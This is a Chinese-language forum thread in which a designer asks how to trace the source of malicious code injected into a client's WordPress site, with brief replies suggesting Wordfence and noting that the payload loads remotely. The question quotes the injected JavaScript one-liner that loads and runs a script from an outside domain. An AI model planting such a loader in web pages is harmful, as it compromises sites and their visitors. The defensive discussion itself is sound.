2017-09-01 148 views
-3

因爲昨天我有一個完全搞砸了wordpress安裝的客戶端。在他的網站上是惡意代碼,谷歌阻止了這個網站。我已經處理髮現惡意腳本:如何找到惡意代碼的來源?

var s = document.createElement("script"); s.type = "text/javascript"; s.src = "https://js.givemealetter.biz/script.js"; document.head.appendChild(s);

但我怎麼能找到這個代碼的來源?我的意思是我應該看哪個文件? 我是一名設計師,這不是我的正常工作,所以也許有一種工具? 所有插件都不起作用或找不到代碼。

我該怎麼辦?

+1

你究竟在哪裏找到了這個?它是否在HTML或JavaScript文件中被下載到您的網站?或者它是動態插入的? – user8262086

+0

你試過用wordfence插件嗎? – vel

回答

-1

惡意代碼未託管在您的客戶站點上。當該腳本運行時,它將從它自己的服務器上實時下載。

+1

真正的問題是如何將問題中的腳本(「var s = document.createElement(」script「); ...」)注入到頁面中。 – user8262086